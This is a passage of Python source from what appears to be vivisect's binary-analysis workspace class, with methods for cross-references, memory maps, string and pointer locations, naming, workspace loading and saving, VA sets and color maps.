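for fromva, tova, rtype, rflags in vw.getXrefsTo(va, rtype=REF_CODE):
dostuff(fromva)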
"""
# FIXME make xrefs use MapLookup!
ret = []
xrefs = self.xrefs_by_to.get(va, None)
if xrefs is None:
return ret
if rtype is None:
return xrefs
return [ xtup for xtup in xrefs if xtup[XR_RTYPE] == rtype ]
def addMemoryMap(self, va, perms, fname, bytes, align=None):
"""
Add a memory map to the workspace. This is the *only* way to
get memory backings into the workspace.
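A minimal sketch (perms use the envi.memory MM_* flags; filebytes stands in
for the raw bytes being mapped):
vw.addMemoryMap(0x400000, e_mem.MM_RWX, 'myfile', filebytes)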
"""
self._fireEvent(VWE_ADDMMAP, (va, perms, fname, bytes, align))
# since we don't return anything from _fireEvent(), pull the new info:
mva, msz, mperm, mbytes = self.getMemoryMap(va)
return msz
def delMemoryMap(self, mapva):
'''
Remove a memory map from the workspace.
'''
self._fireEvent(VWE_DELMMAP, mapva)
def addSegment(self, va, size, name, filename):
"""
Add a "segment" to the workspace. A segment is generally some meaningful
area inside of a memory map. For PE binaries, a segment and a memory map
are synonymous. However, some platforms (ELF) specify their memory maps
(program headers) and segments (sections) separately.
"""
self._fireEvent(VWE_ADDSEGMENT, (va,size,name,filename))
def getSegment(self, va):
"""
Return the tuple representation of a segment. With the
following format:
(va, size, name, filename)
"""
for seg in self.segments:
sva, ssize, sname, sfile = seg
if va >= sva and va < (sva + ssize):
return seg
return None
def getSegments(self):
"""
Return a list of segment tuples (see getSegment) for all
the segments defined in the current workspace
"""
return list(self.segments)
def addCodeBlock(self, va, size, funcva):
"""
Add a region of code which belongs to a function. Code-block boundaries
are at all logical branches and have more in common with a logical
graph view than function chunks.
"""
loc = self.getLocation( va )
if loc is None:
raise Exception('Adding Codeblock on *non* location?!?: 0x%.8x' % va)
self._fireEvent(VWE_ADDCODEBLOCK, (va,size,funcva))
def getCodeBlock(self, va):
"""
Return the codeblock which contains the given va. A "codeblock"
is a location compatible tuple: (va, size, funcva)
"""
return self.blockmap.getMapLookup(va)
def delCodeBlock(self, va):
"""
Remove a code-block definition from the codeblock namespace.
"""
cb = self.getCodeBlock(va)
if cb is None:
raise Exception("Unknown Code Block: 0x%x" % va)
self._fireEvent(VWE_DELCODEBLOCK, cb)
def getCodeBlocks(self):
"""
Return a list of all the codeblock objects.
"""
return list(self.codeblocks)
def addXref(self, fromva, tova, reftype, rflags=0):
"""
Add an xref with the specified fromva, tova, and reftype
(see REF_ macros). This will *not* trigger any analysis.
Callers are expected to do their own xref analysis (ie, makeCode() etc)
"""
# Architecture gets to decide on actual final VA (ARM/THUMB/etc...)
tova, reftype, rflags = self.arch.archModifyXrefAddr(tova, reftype, rflags)
ref = (fromva, tova, reftype, rflags)
if ref in self.getXrefsFrom(fromva):
return
self._fireEvent(VWE_ADDXREF, (fromva, tova, reftype, rflags))
def delXref(self, ref):
"""
Remove the given xref. This *will* exception if the
xref doesn't already exist...
"""
if ref not in self.getXrefsFrom(ref[XR_FROM]):
raise Exception("Unknown Xref: %x %x %d" % ref)
self._fireEvent(VWE_DELXREF, ref)
def analyzePointer(self, va):
"""
Assume that a new pointer has been created. Check if it's
target has a defined location and if not, try to figure out
what's there. Will return the location type of the location
it recommends or None if a location is already there or it has
no idea.
"""
if self.getLocation(va) is not None:
return None
if self.isProbablyUnicode(va):
return LOC_UNI
elif self.isProbablyString(va):
return LOC_STRING
elif self.isProbablyCode(va):
return LOC_OP
return None
def getMeta(self, name, default=None):
return self.metadata.get(name, default)
def setMeta(self, name, value):
"""
Set a meta key,value pair for this workspace.
"""
self._fireEvent(VWE_SETMETA, (name,value))
def markDeadData(self, start, end):
"""
mark a virtual address range as dead data.
"""
self.setMeta("deaddata:0x%08x" % start, (start, end))
def unmarkDeadData(self, start, end):
"""
unmark a virtual address range as dead data
"""
self._dead_data.remove( (start,end) )
def _mcb_deaddata(self, name, value):
"""
callback from setMeta with namespace
deaddata:
that indicates a range has been added
as dead data.
"""
if value not in self._dead_data:
self._dead_data.append( value )
def isDeadData(self, va):
"""
Return boolean indicating va is in
a dead data range.
"""
for start,end in self._dead_data:
if va >= start and va <= end:
return True
return False
def initMeta(self, name, value):
"""
Set a metakey ONLY if it is not already set. Either
way return the value of the meta key.
"""
m = self.getMeta(name)
if m is None:
self.setMeta(name, value)
m = value
return m
def getTransMeta(self, mname, default=None):
'''
Retrieve a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
return self.transmeta.get(mname,default)
def setTransMeta(self, mname, value):
'''
Store a piece of "transient" metadata which is *not*
stored across runs or pushed through the event subsystem.
'''
self.transmeta[mname] = value
def castPointer(self, va):
"""
Return the value for a pointer in memory at
the given location. This method does NOT
create a location object or do anything other
than parse memory.
"""
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, self.psize, bigend=self.bigend)
def guessDataPointer(self, ref, tsize):
'''
Trust vivisect to do the right thing and make a value and a
pointer to that value
'''
# So we need the size check to avoid things like "aaaaa", maybe
# but maybe if we do something like the tsize must be either the
# target pointer size or in a set of them that the arch defines?
nloc = None
try:
if self.isProbablyUnicode(ref):
nloc = self.makeUnicode(ref)
elif self.isProbablyString(ref):
nloc = self.makeString(ref)
except e_exc.SegmentationViolation:
# Usually means val is 0 and we can just ignore this error
nloc = None
except Exception as e:
logger.warning('makeOpcode string making hit error %s', str(e))
nloc = None
if not nloc:
val = self.parseNumber(ref, tsize)
if (self.psize == tsize and self.isValidPointer(val)):
nloc = self.makePointer(ref, tova=val)
else:
nloc = self.makeNumber(ref, tsize)
return nloc
def makePointer(self, va, tova=None, follow=True):
"""
Create a new pointer location in the workspace. If you have already
parsed out the pointers value, you may specify tova to speed things
up.
"""
loctup = self.getLocation(va)
if loctup is not None:
if loctup[L_LTYPE] != LOC_POINTER or loctup[L_VA] != va:
logger.warning("0x%x: Attempting to make a Pointer where another location object exists (of type %r)", va, self.reprLocation(loctup))
return None
psize = self.psize
# Get and document the xrefs created for the new location
if tova is None:
tova = self.castPointer(va)
self.addXref(va, tova, REF_PTR)
ploc = self.addLocation(va, psize, LOC_POINTER)
if follow and self.isValidPointer(tova):
self.followPointer(tova)
return ploc
def makePad(self, va, size):
"""
A special utility for making a pad of a particular size.
"""
return self.addLocation(va, size, LOC_PAD, None)
def makeNumber(self, va, size, val=None):
"""
Create a number location in memory of the given size.
(you may specify val if you have already parsed the value
from memory and would like to save CPU cycles)
"""
return self.addLocation(va, size, LOC_NUMBER, None)
def parseNumber(self, va, size):
'''
Parse a <size> width numeric value from memory at <va>.
Example:
val = vw.parseNumber(0x41414140, 4)
'''
offset, bytes = self.getByteDef(va)
return e_bits.parsebytes(bytes, offset, size, bigend=self.bigend)
def _getSubstrings(self, va, size, ltyp):
# rip through the desired memory range to populate any substrings
subs = set()
end = va + size
for offs in range(va, end, 1):
loc = self.getLocation(offs, range=True)
if loc and loc[L_LTYPE] == LOC_STRING and loc[L_VA] > va:
subs.add((loc[L_VA], loc[L_SIZE]))
if loc[L_TINFO]:
subs = subs.union(set(loc[L_TINFO]))
return list(subs)
def _getStrTinfo(self, va, size, subs):
ploc = self.getLocation(va, range=False)
if ploc:
# the string we're making is a substring of some outer one
# still make this string location, but let the parent know about us too and our
# children as well. Ultimately, the outermost parent should be responsible for
# knowing about all its substrings
modified = False
pva, psize, ptype, pinfo = ploc
if ptype not in (LOC_STRING, LOC_UNI):
return va, size, subs
if (va, size) not in pinfo:
modified = True
pinfo.append((va, size))
for sva, ssize in subs:
if (sva, ssize) not in pinfo:
modified = True
pinfo.append((sva, ssize))
tinfo = pinfo
if modified:
va = pva
size = psize
else:
tinfo = subs
return va, size, tinfo
def makeString(self, va, size=None):
"""
Create a new string location at the given VA. You may optionally
specify size. If size==None, the string will be parsed as a NULL
terminated ASCII string.
Substrings are also handled here. Generally, the idea is:
* if the memory range is completely undefined, we just create a new string at the VA specified (provided that asciiStringSize returns a size greater than 0 or the parameter size is greater than 0)
* if we create a string A at virtual address 0x40 with size 20, and then later a string B at virtual
address 0x44, we won't actually make a new location for the string B, but rather add info to the
tinfo portion of the location tuple for string A, and when trying to retrieve string B via getLocation,
we'll make up a (sort of) fake location tuple for string B, provided that range=True is passed to
getLocation
* if we create string A at virtual address 0x40, and then later a string B at virtual 0x30
that has a size of 16 or more, we overwrite the string A with the location information for string B,
and demote string A to being a tuple of (VA, size) inside of string B's location information.
This method only captures suffixes, but perhaps in the future we'll have symbolik resolution that can
capture true substrings that aren't merely suffixes.
This same formula is applied to unicode detection as well
"""
if size is None:
size = self.asciiStringSize(va)
if size <= 0:
raise Exception("Invalid String Size: %d" % size)
# rip through the desired memory range to populate any substrings
subs = self._getSubstrings(va, size, LOC_STRING)
pva, psize, tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace(b'\n', b'')
self.makeName(va, "str_%s_%.8x" % (m[:16].decode('utf-8'), va))
return self.addLocation(pva, psize, LOC_STRING, tinfo=tinfo)
def makeUnicode(self, va, size=None):
if size is None:
size = self.uniStringSize(va)
if size <= 0:
raise Exception("Invalid Unicode Size: %d" % size)
subs = self._getSubstrings(va, size, LOC_UNI)
pva, psize, tinfo = self._getStrTinfo(va, size, subs)
if self.getName(va) is None:
m = self.readMemory(va, size-1).replace(b'\n', b'').replace(b'\0', b'')
try:
self.makeName(va, "wstr_%s_%.8x" % (m[:16].decode('utf-8'), va))
except:
self.makeName(va, "wstr_%s_%.8x" % (m[:16],va))
return self.addLocation(pva, psize, LOC_UNI, tinfo=tinfo)
def addConstModule(self, modname):
'''
Add constants declared within the named module
to the constants resolver namespace.
Example: vw.addConstModule('vstruct.constants.ntstatus')
'''
mod = self.loadModule(modname)
self.vsconsts.addModule(mod)
def addStructureModule(self, namespace, modname):
'''
Add a vstruct structure module to the workspace with the given
namespace.
Example: vw.addStructureModule('ntdll', 'vstruct.defs.windows.win_5_1_i386.ntdll')
This allows subsequent struct lookups by names like 'ntdll.<structname>'.
'''
mod = self.loadModule(modname)
self.vsbuilder.addVStructNamespace(namespace, mod)
def getStructure(self, va, vstructname):
"""
Parse and return a vstruct object for the given name. This
(like parseOpcode) does *not* require that the location be a struct
and will not create one (use makeStructure).
"""
s = vstruct.getStructure(vstructname)
if s is None:
s = self.vsbuilder.buildVStruct(vstructname)
if s is not None:
bytes = self.readMemory(va, len(s))
s.vsParse(bytes)
return s
def makeStructure(self, va, vstructname, vs=None):
"""
Make a location which is a structure and will be parsed/accessed
by vstruct. You must specify the vstruct name for the structure
you wish to have at the location. Returns a vstruct from the
location.
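A minimal sketch ('pe.IMAGE_DOS_HEADER' stands in for any structure name
resolvable by vstruct or a namespace added via addStructureModule):
vs = vw.makeStructure(va, 'pe.IMAGE_DOS_HEADER')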
"""
if vs is None:
vs = self.getStructure(va, vstructname)
self.addLocation(va, len(vs), LOC_STRUCT, vstructname)
# Determine if there are any pointers we need make
# xrefs for...
offset = 0
for p in vs.vsGetPrims():
if isinstance(p, vs_prims.v_ptr):
vptr = p.vsGetValue()
if self.isValidPointer(vptr):
self.addXref(va+offset, vptr, REF_PTR)
offset += len(p)
return vs
def getUserStructNames(self):
'''
        Retrieve the list of the existing user-defined structure
names.
Example:
for name in vw.getUserStructNames():
print('Structure Name: %s' % name)
'''
return self.vsbuilder.getVStructCtorNames()
def getUserStructSource(self, sname):
'''
Get the source code (as a string) for the given user
defined structure.
Example:
ssrc = vw.getUserStructSource('MyStructureThing')
'''
return self.getMeta('ustruct:%s' % sname)
def setUserStructSource(self, ssrc):
'''
Save the input string as a C structure definition for the
workspace. User-defined structures may then be applied
to locations, or further edited in the future.
Example:
src = "struct woot { int x; int y; };"
vw.setUserStructSource( src )
'''
# First, we make sure it compiles...
ctor = vs_cparse.ctorFromCSource( ssrc )
# Then, build one to get the name from it...
vs = ctor()
cname = vs.vsGetTypeName()
self.setMeta('ustruct:%s' % cname, ssrc)
return cname
def asciiStringSize(self, va):
"""
Return the size (in bytes) of the ascii string
        at the specified location (or the number of bytes remaining
        in the memory map if no NULL terminator is found)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find(b'\x00', offset)
if foff == -1:
return len(bytez) - offset
return (foff - offset) + 1
def uniStringSize(self, va):
"""
Return the size (in bytes) of the unicode string
at the specified location (or -1 if no terminator
is found in the memory map)
"""
offset, bytez = self.getByteDef(va)
foff = bytez.find(b'\x00\x00', offset)
if foff == -1:
return foff
return (foff - offset) + 2
def addLocation(self, va, size, ltype, tinfo=None):
"""
Add a location tuple.
"""
ltup = (va, size, ltype, tinfo)
#loc = self.locmap.getMapLookup(va)
#if loc is not None:
#raise Exception('Duplicate Location: (is: %r wants: %r)' % (loc,ltup))
self._fireEvent(VWE_ADDLOCATION, ltup)
return ltup
def getLocations(self, ltype=None, linfo=None):
"""
Return a list of location objects from the workspace
of a particular type.
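        Example (illustrative):
            for lva, lsize, ltype, tinfo in vw.getLocations(LOC_STRING):
                print('string at 0x%.8x (%d bytes)' % (lva, lsize))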
"""
if ltype is None:
return list(self.loclist)
if linfo is None:
return [ loc for loc in self.loclist if loc[2] == ltype ]
return [ loc for loc in self.loclist if (loc[2] == ltype and loc[3] == linfo) ]
def isLocation(self, va, range=False):
"""
Return True if the va represents a location already.
"""
if self.getLocation(va, range=range) is not None:
return True
return False
def isLocType(self, va, ltype):
"""
You may use this to test if a given VA represents
a location of the specified type.
example:
if vw.isLocType(0x41414141, LOC_STRING):
print("string at: 0x41414141")
"""
# make it operate like py2 did
if va is None:
return False
tup = self.getLocation(va)
if tup is None:
return False
return tup[L_LTYPE] == ltype
def getLocation(self, va, range=True):
"""
Return the va,size,ltype,tinfo tuple for the given location.
(specify range=True to potentially match a va that is inside
a location rather than the beginning of one, this behavior
only affects strings/substring retrieval currently)
"""
loc = self.locmap.getMapLookup(va)
if not loc:
return loc
if range and loc[L_LTYPE] in (LOC_STRING, LOC_UNI):
# dig into any sublocations that may have been created, trying to find the best match
# possible, where "best" means the substring that both contains the va, and has no substrings
# that contain the va.
if not loc[L_TINFO]:
return loc
subs = sorted(loc[L_TINFO], key=lambda k: k[0], reverse=False)
ltup = loc
for sva, ssize in subs:
if sva <= va < sva + ssize:
ltup = (sva, ssize, loc[L_LTYPE], [])
return ltup
else:
return loc
def getLocationRange(self, va, size):
"""
A "location range" is a list of location tuples where
undefined space *will* be represented by LOC_UNDEF tuples
to provide a complete accounting of linear workspace.
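        Example (illustrative; the va and size are hypothetical):
            for lva, lsize, ltype, tinfo in vw.getLocationRange(va, 32):
                if ltype == LOC_UNDEF:
                    print('undefined bytes at 0x%.8x (%d)' % (lva, lsize))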
"""
ret = []
endva = va+size
undefva = None
while va < endva:
ltup = self.getLocation(va)
if ltup is None:
if undefva is None:
undefva = va
va += 1
else:
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
undefva = None
ret.append(ltup)
va += ltup[L_SIZE]
        # Mop up any hanging undefs
if undefva is not None:
ret.append((undefva, va-undefva, LOC_UNDEF, None))
return ret
def delLocation(self, va):
"""
Delete the given Location object from the binary
(removes any xrefs/etc for the location as well)
This will raise InvalidLocation if the va is not
an exact match for the beginning of a location.
"""
loc = self.getLocation(va)
if loc is None:
raise InvalidLocation(va)
# remove xrefs from this location
for xref in self.getXrefsFrom(va):
self.delXref(xref)
self._fireEvent(VWE_DELLOCATION, loc)
def getRenderInfo(self, va, size):
"""
Get nearly everything needed to render a workspace area
to a display. This function *greatly* speeds up interface
code and is considered "tightly coupled" with the asmview
code. (and is therefore subject to change).
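        Example (illustrative):
            locs, funcs, names, comments, extras = vw.getRenderInfo(va, 256)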
"""
locs = []
funcs = {}
names = {}
comments = {}
extras = {}
for loc in self.getLocationRange(va, size):
lva, lsize, ltype, tinfo = loc
locs.append(loc)
name = self.getName(lva)
isfunc = self.isFunction(lva)
cmnt = self.getComment(lva)
if name is not None:
names[lva] = name
if isfunc == True:
funcs[lva] = True
if cmnt is not None:
comments[lva] = cmnt
if ltype == LOC_UNDEF:
# Expand out all undefs so we can send all the info
endva = lva + lsize
while lva < endva:
uname = self.getName(lva)
ucmnt = self.getComment(lva)
if uname is not None:
names[lva] = uname
if ucmnt is not None:
comments[lva] = ucmnt
#ret.append(((lva, 1, LOC_UNDEF, None), self.getName(lva), False, self.getComment(lva)))
lva += 1
elif ltype == LOC_OP:
extras[lva] = self.parseOpcode(lva)
elif ltype == LOC_STRUCT:
extras[lva] = self.getStructure(lva, tinfo)
return locs, funcs, names, comments, extras
def getPrevLocation(self, va, adjacent=True):
"""
Get the previous location behind this one. If adjacent
is true, only return a location which is IMMEDIATELY behind
the given va, otherwise search backward for a location until
you find one or hit the edge of the segment.
"""
va -= 1
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
if adjacent:
return None
va -= 1
while va > 0:
ret = self.locmap.getMapLookup(va)
if ret is not None:
return ret
va -= 1
return None
def vaByName(self, name):
return self.va_by_name.get(name, None)
def getLocationByName(self, name):
"""
Return a location object by the name of the
location.
"""
va = self.vaByName(name)
if va is None:
raise InvalidLocation(0, "Unknown Name: %s" % name)
return self.getLocation(va)
def getNames(self):
"""
Return a list of tuples containing (va, name)
"""
return list(self.name_by_va.items())
def getName(self, va, smart=False):
'''
Returns the name of the specified virtual address (or None).
Smart mode digs beyond simple name lookups, as follows:
If va falls within a known function in the workspace, we return "funcname+<delta>".
If not, and the va falls within a mapped binary, we return "filename+<delta>"
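        Example (illustrative; actual output depends on workspace contents):
            vw.getName(fva + 4, smart=True)   # -> something like 'myfunc+0x4'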
'''
name = self.name_by_va.get(va)
if name is not None or not smart:
return name
# TODO: by previous symbol?
# by function
baseva = self.getFunction(va)
basename = self.name_by_va.get(baseva, None)
if self.isFunction(va):
basename = 'sub_0%x' % va
# by filename
if basename is None:
basename = self.getFileByVa(va)
if basename is None:
return None
baseva = self.getFileMeta(basename, 'imagebase')
delta = va - baseva
if delta:
pom = ('', '+')[delta>0]
name = "%s%s%s" % (basename, pom, hex(delta))
else:
name = basename
return name
def makeName(self, va, name, filelocal=False, makeuniq=False):
"""
Set a readable name for the given location by va. There
*must* be a Location defined for the VA before you may name
it. You may set a location's name to None to remove a name.
makeuniq allows Vivisect to append some number to make the name unique.
This behavior allows for colliding names (eg. different versions of a function)
to coexist in the same workspace.
default behavior is to fail on duplicate (False).
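        Example (illustrative; the va and name are hypothetical):
            vw.makeName(va, 'decode_buffer', filelocal=True)
            # with makeuniq=True a colliding name becomes decode_buffer_0, decode_buffer_1, ...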
"""
if filelocal:
segtup = self.getSegment(va)
if segtup is None:
self.vprint("Failed to find file for 0x%.8x (%s) (and filelocal == True!)" % (va, name))
if segtup is not None:
fname = segtup[SEG_FNAME]
if fname is not None:
name = "%s.%s" % (fname, name)
oldva = self.vaByName(name)
# If that's already the name, ignore the event
if oldva == va:
return
if oldva is not None:
if not makeuniq:
raise DuplicateName(oldva, va, name)
else:
logger.debug('makeName: %r already lives at 0x%x', name, oldva)
# tack a number on the end
index = 0
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
                while newoldva is not None:
# if we run into the va we're naming, that's the name still
if newoldva == va:
return newname
logger.debug('makeName: %r already lives at 0x%x', newname, newoldva)
index += 1
newname = "%s_%d" % (name, index)
newoldva = self.vaByName(newname)
name = newname
self._fireEvent(VWE_SETNAME, (va,name))
return name
def saveWorkspace(self, fullsave=True):
if self.server is not None:
return
modname = self.getMeta("StorageModule")
filename = self.getMeta("StorageName")
if modname is None:
raise Exception("StorageModule not specified!")
if filename is None:
raise Exception("StorageName not specified!")
# Usually this is "vivisect.storage.basicfile
mod = self.loadModule(modname)
# If they specified a full save, *or* this event list
# has never been saved before, do a full save.
if fullsave:
mod.saveWorkspace(self, filename)
else:
mod.saveWorkspaceChanges(self, filename)
self._createSaveMark()
def loadFromFd(self, fd, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file descriptor and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
Returns the file md5
"""
mod = None
fd.seek(0)
if fmtname is None:
            byts = fd.read(32)
            fmtname = viv_parsers.guessFormat(byts)
mod = viv_parsers.getParserModule(fmtname)
if hasattr(mod, "config"):
self.mergeConfig(mod.config)
fd.seek(0)
fname = mod.parseFd(self, fd, filename=None, baseaddr=baseaddr)
outfile = hashlib.md5(fd.read()).hexdigest()
self.initMeta("StorageName", outfile+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def loadParsedBin(self, pbin, fmtname=None, baseaddr=None):
'''
Load an already parsed PE or Elf file into the workspace. Raises an exception if
the file isn't one of those two.
Returns the file md5
'''
fd = pbin.fd
fd.seek(0)
if fmtname is None:
byts = fd.read(32)
fmtname = viv_parsers.guessFormat(byts)
filename = hashlib.md5(fd.read()).hexdigest()
mod = viv_parsers.getParserModule(fmtname)
if hasattr(mod, "config"):
self.mergeConfig(mod.config)
if fmtname == 'pe':
mod.loadPeIntoWorkspace(self, pbin)
elif fmtname == 'elf':
mod.loadElfIntoWorkspace(self, pbin)
else:
            raise Exception('Failed to load in the parsed module for format %s' % fmtname)
self.initMeta("StorageName", filename+".viv")
self._snapInAnalysisModules()
        return filename
def _saveSymbolCaches(self):
if not self.config.vdb.SymbolCacheActive:
return
pathstr = self.config.vdb.SymbolCachePath
symcache = e_symcache.SymbolCachePath(pathstr)
symsbyfile = collections.defaultdict(list)
# Get the image base addresses
imgbases = {}
for fname in self.getFiles():
imgbases[ fname ] = self.getFileMeta(fname,'imagebase')
for va,name in self.name_by_va.items():
mmap = self.getMemoryMap(va)
if mmap is None:
continue
symva = va - imgbases.get(mmap[3], va)
if symva:
symtype = e_resolv.SYMSTOR_SYM_SYMBOL
if self.isFunction(va):
symtype = e_resolv.SYMSTOR_SYM_FUNCTION
symsbyfile[mmap[3]].append((symva, 0, name, symtype))
for filenorm, symtups in symsbyfile.items():
symhash = self.getFileMeta(filenorm, 'SymbolCacheHash')
if symhash is None:
continue
self.vprint('Saving Symbol Cache: %s (%d syms)' % (symhash,len(symtups)))
symcache.setCacheSyms( symhash, symtups )
def loadFromFile(self, filename, fmtname=None, baseaddr=None):
"""
Read the first bytes of the file and see if we can identify the type.
If so, load up the parser for that file type, otherwise raise an exception.
( if it's a workspace, trigger loadWorkspace() as a convenience )
Returns the basename the file was given on load.
"""
mod = None
if fmtname is None:
fmtname = viv_parsers.guessFormatFilename(filename)
if fmtname in STORAGE_MAP:
self.setMeta('StorageModule', STORAGE_MAP[fmtname])
self.loadWorkspace(filename)
return self.normFileName(filename)
mod = viv_parsers.getParserModule(fmtname)
fname = mod.parseFile(self, filename=filename, baseaddr=baseaddr)
self.initMeta("StorageName", filename+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
return fname
def loadFromMemory(self, memobj, baseaddr, fmtname=None):
"""
Load a memory map (or potentially a mapped binary file)
from the memory object's map at baseaddr.
"""
mod = None
if fmtname is None:
bytez = memobj.readMemory(baseaddr, 32)
fmtname = viv_parsers.guessFormat(bytez)
# TODO: Load workspace from memory?
mod = viv_parsers.getParserModule(fmtname)
mod.parseMemory(self, memobj, baseaddr)
mapva, mapsize, mapperm, mapfname = memobj.getMemoryMap(baseaddr)
if not mapfname:
mapfname = 'mem_map_%.8x' % mapva
self.initMeta('StorageName', mapfname+".viv")
# Snapin our analysis modules
self._snapInAnalysisModules()
def getFiles(self):
"""
Return the current list of file objects in this
workspace.
"""
return list(self.filemeta.keys())
def normFileName(self, filename):
normname = os.path.basename(filename).lower()
# Strip off an extension
if normname.find('.') != -1:
parts = normname.split('.')
normname = '_'.join(parts[:-1])
ok = string.ascii_letters + string.digits + '_'
chars = list(normname)
for i in range(len(chars)):
if chars[i] not in ok:
chars[i] = '_'
normname = ''.join(chars)
#if normname[0].isdigit():
#normname = '_' + normname
return normname
def addFile(self, filename, imagebase, md5sum):
"""
Create and add a new vivisect File object for the
specified information. This will return the file
object which you may then use to do things like
add imports/exports/segments etc...
"""
nname = self.normFileName(filename)
if nname in self.filemeta:
raise Exception("Duplicate File Name: %s" % nname)
self._fireEvent(VWE_ADDFILE, (nname, imagebase, md5sum))
return nname
def addEntryPoint(self, va):
'''
Add an entry point to the definition for the given file. This
will hint the analysis system to create functions when analysis
is run.
NOTE: No analysis is triggered by this function.
'''
self.setVaSetRow('EntryPoints', (va,))
def getEntryPoints(self):
'''
Get all the parsed entry points for all the files loaded into the
workspace.
Example: for va in vw.getEntryPoints():
'''
return [ x for x, in self.getVaSetRows('EntryPoints') ]
def setFileMeta(self, fname, key, value):
"""
        Store a piece of file specific metadata (python primitives are best for values)
"""
if fname not in self.filemeta:
raise Exception("Invalid File: %s" % fname)
self._fireEvent(VWE_SETFILEMETA, (fname, key, value))
def getFileMeta(self, filename, key, default=None):
"""
Retrieve a piece of file specific metadata
"""
d = self.filemeta.get(filename)
if d is None:
raise Exception("Invalid File: %s" % filename)
return d.get(key, default)
def getFileMetaDict(self, filename):
'''
Retrieve the file metadata for this file as a key:val dict.
'''
d = self.filemeta.get(filename)
if d is None:
raise Exception('Invalid File: %s' % filename)
return d
def getFileByVa(self, va):
segtup = self.getSegment(va)
if segtup is None:
return None
return segtup[SEG_FNAME]
def getLocationDistribution(self):
# NOTE: if this changes, don't forget the report module!
totsize = 0
for mapva, mapsize, mperm, mname in self.getMemoryMaps():
totsize += mapsize
loctot = 0
ret = {}
for i in range(LOC_MAX):
cnt = 0
size = 0
for lva,lsize,ltype,tinfo in self.getLocations(i):
cnt += 1
size += lsize
loctot += size
tname = loc_type_names.get(i, 'Unknown')
ret[i] = (tname, cnt, size, int((size/float(totsize))*100))
# Update the undefined based on totals...
undeftot = totsize-loctot
ret[LOC_UNDEF] = ('Undefined', 0, undeftot, int((undeftot/float(totsize)) * 100))
return ret
#################################################################
#
# VA Set API
#
def getVaSetNames(self):
"""
Get a list of the names of the current VA lists.
"""
return list(self.vasets.keys())
def getVaSetDef(self, name):
"""
Get the list of (name, type) pairs which make up the
rows for this given VA set (the first one *always* the VA, but
you can name it as you like...)
"""
x = self.vasetdefs.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def getVaSetRows(self, name):
"""
Get a list of the rows in this VA set.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
# yes, this is weird. but it's how python2 returns values()
return list(x.values())
def getVaSet(self, name):
"""
Get the dictionary of va:<rowdata> entries.
"""
x = self.vasets.get(name)
if x is None:
raise InvalidVaSet(name)
return x
def addVaSet(self, name, defs, rows=()):
"""
Add a va set:
name - The name for this VA set
defs - List of (<name>,<type>) tuples for the rows (va is always first)
rows - An initial set of rows for values in this set.
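        Example (illustrative sketch; the column type constant is assumed to come
        from vivisect.const):
            vw.addVaSet('WootFunctions', (('FuncVa', VASET_ADDRESS),))
            vw.setVaSetRow('WootFunctions', (fva,))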
"""
self._fireEvent(VWE_ADDVASET, (name, defs, rows))
def delVaSet(self, name):
"""
Delete a VA set by name.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASET, name)
def setVaSetRow(self, name, rowtup):
"""
Use this API to update the row data for a particular
entry in the VA set.
"""
self._fireEvent(VWE_SETVASETROW, (name, rowtup))
def getVaSetRow(self, name, va):
'''
Retrieve the va set row for va in the va set named name.
Example:
row = vw.getVaSetRow('WootFunctions', fva)
'''
vaset = self.vasets.get( name )
if vaset is None:
return None
return vaset.get( va )
def delVaSetRow(self, name, va):
"""
Use this API to delete the rowdata associated
with the specified VA from the set.
"""
if name not in self.vasets:
raise Exception("Unknown VA Set: %s" % name)
self._fireEvent(VWE_DELVASETROW, (name, va))
#################################################################
#
# Shared Workspace APIs
#
def chat(self, msg):
uname = e_config.getusername()
# FIXME this should be part of a UI event model.
self._fireEvent(VWE_CHAT, (uname, msg))
def iAmLeader(self, winname):
'''
Announce that your workspace is leading a window with the
specified name. This allows others to opt-in to following
the nav events for the given window name.
Example:
vw.iAmLeader('WindowTitle')
'''
if not self.server:
raise Exception('iAmLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_IAMLEADER, (user,winname))
def followTheLeader(self, winname, expr):
'''
Announce a new memory expression to navigate to if if a given window
is following the specified user/winname
Example:
vw.followTheLeader('FunExample', 'sub_08042323')
'''
if not self.server:
raise Exception('followTheLeader() requires being connected to a server.')
user = e_config.getusername()
self.server._fireEvent(VTE_MASK | VTE_FOLLOWME, (user,winname, expr))
#################################################################
#
# Color Map API
#
def getColorMaps(self):
"""
Return a list of the names of the given color maps
"""
return list(self.colormaps.keys())
def addColorMap(self, mapname, colormap):
"""
Add a colormap dictionary with the given name for the map.
(A colormap dictionary is va:color entries)
"""
self._fireEvent(VWE_ADDCOLOR, (mapname, colormap))
def delColorMap(self, mapname):
self._fireEvent(VWE_DELCOLOR, mapname)
def getColorMap(self, mapname):
"""
Return the colormap dictionary for the given map name.
"""
return self.colormaps.get(mapname)
def _getNameParts(self, name, va):
'''
Return the given name in three parts:
fpart: filename, if applicable (for file-local names)
npart: base name
vapart: address, if tacked on the end
If any of these are not applicable, they will return None for that field.
'''
fpart = None
npart = name
vapart = None
fname = self.getFileByVa(va)
vastr = '_%.8x' % va
if name.startswith(fname + '.'):
fpart, npart = name.split('.', 1)
elif name.startswith('*.'):
skip, npart = name.split('.', 1)
if npart.endswith(vastr) and not npart == 'sub' + vastr:
npart, vapart = npart.rsplit('_', 1)
return fpart, npart, vapart
def _addNamePrefix(self, name, va, prefix, joinstr=''):
'''
Add a prefix to the given name paying attention to the filename prefix, and
any VA suffix which may exist.
'''
fpart, npart, vapart = self._getNameParts(name, va)
if fpart is None and vapart is None:
name = joinstr.join([prefix, npart])
elif vapart is None:
name = fpart + '.' + joinstr.join([prefix, npart])
elif fpart is None:
name = joinstr.join([prefix, npart])
else:
